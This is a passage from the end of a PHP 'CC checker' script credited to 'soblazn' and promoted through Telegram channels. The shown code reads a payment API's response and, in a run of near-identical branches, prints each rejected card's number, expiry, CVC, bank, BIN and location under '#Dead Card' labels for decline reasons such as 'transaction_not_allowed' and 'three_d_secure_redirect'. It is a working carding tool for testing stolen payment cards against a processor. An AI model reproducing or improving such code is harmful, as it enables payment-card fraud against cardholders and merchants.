class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result,'Your card does not support this type of purchase.')) {
    echo '<span class="badge badge-yellow">#Reprovada </span></br> <span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> CC Details </span> <span class="badge badge-yellow">♛</span></br> <span class="badge badge-yellow">#Dead Card</span></br> <span class="badge badge-yellow">CC = '.$cc.'</span></br></b><span class="badge badge-yellow">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-yellow">CVC = '.$cvv.'</span></br><span class="badge badge-yellow">Code = Your card does not support this type of purchase </span></br><span class="badge badge-yellow">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result,"transaction_not_allowed")){
    echo '<span class="badge badge-yellow">#Reprovada </span></br> <span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> CC Details </span> <span class="badge badge-yellow">♛</span></br> <span class="badge badge-yellow">#Dead Card</span></br> <span class="badge badge-yellow">CC = '.$cc.'</span></br></b><span class="badge badge-yellow">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-yellow">CVC = '.$cvv.'</span></br><span class="badge badge-yellow">Code = Transaction Not Allowed </span></br><span class="badge badge-yellow">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result,"three_d_secure_redirect")){
     echo '<span class="badge badge-yellow">#Reprovada </span></br> <span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> CC Details </span> <span class="badge badge-yellow">♛</span></br> <span class="badge badge-yellow">#Dead Card</span></br> <span class="badge badge-yellow">CC = '.$cc.'</span></br></b><span class="badge badge-yellow">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-yellow">CVC = '.$cvv.'</span></br><span class="badge badge-yellow">Code = Three D Secure Redirect </span></br><span class="badge badge-yellow">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, 'Card is declined by your bank, please contact them for additional information.')) {
    echo '<span class="badge badge-yellow">#Reprovada </span></br> <span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> CC Details </span> <span class="badge badge-yellow">♛</span></br> <span class="badge badge-yellow">#Dead Card</span></br> <span class="badge badge-yellow">CC = '.$cc.'</span></br></b><span class="badge badge-yellow">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-yellow">CVC = '.$cvv.'</span></br><span class="badge badge-yellow">Code = Card is declined by your bank, please contact them for additional information </span></br><span class="badge badge-yellow">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result,"missing_payment_information")){
     echo '<span class="badge badge-yellow">#Reprovada </span></br> <span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> CC Details </span> <span class="badge badge-yellow">♛</span></br> <span class="badge badge-yellow">#Dead Card</span></br> <span class="badge badge-yellow">CC = '.$cc.'</span></br></b><span class="badge badge-yellow">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-yellow">CVC = '.$cvv.'</span></br><span class="badge badge-yellow">Code = Missing Payment Information </span></br><span class="badge badge-yellow">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, "Payment cannot be processed, missing credit card number")) {
     echo '<span class="badge badge-yellow">#Reprovada </span></br> <span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> CC Details </span> <span class="badge badge-yellow">♛</span></br> <span class="badge badge-yellow">#Dead Card</span></br> <span class="badge badge-yellow">CC = '.$cc.'</span></br></b><span class="badge badge-yellow">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-yellow">CVC = '.$cvv.'</span></br><span class="badge badge-yellow">Code = Payment cannot be processed, missing credit card number </span></br><span class="badge badge-yellow">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
else {
    echo '<span class="badge badge-yellow">#Reprovada </span></br> <span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> CC Details </span> <span class="badge badge-yellow">♛</span></br> <span class="badge badge-yellow">#Dead Card</span></br> <span class="badge badge-yellow">CC = '.$cc.'</span></br></b><span class="badge badge-yellow">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-yellow">CVC = '.$cvv.'</span></br><span class="badge badge-yellow">Code = Error Not Listed </span></br><span class="badge badge-yellow">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
curl_close($ch);
ob_flush();
/////////////////////// ♛ soblazn ♛  ///////////////////////////////////
////////////////////// Join @Monster_Checker for more  //////////////////////////////////
?>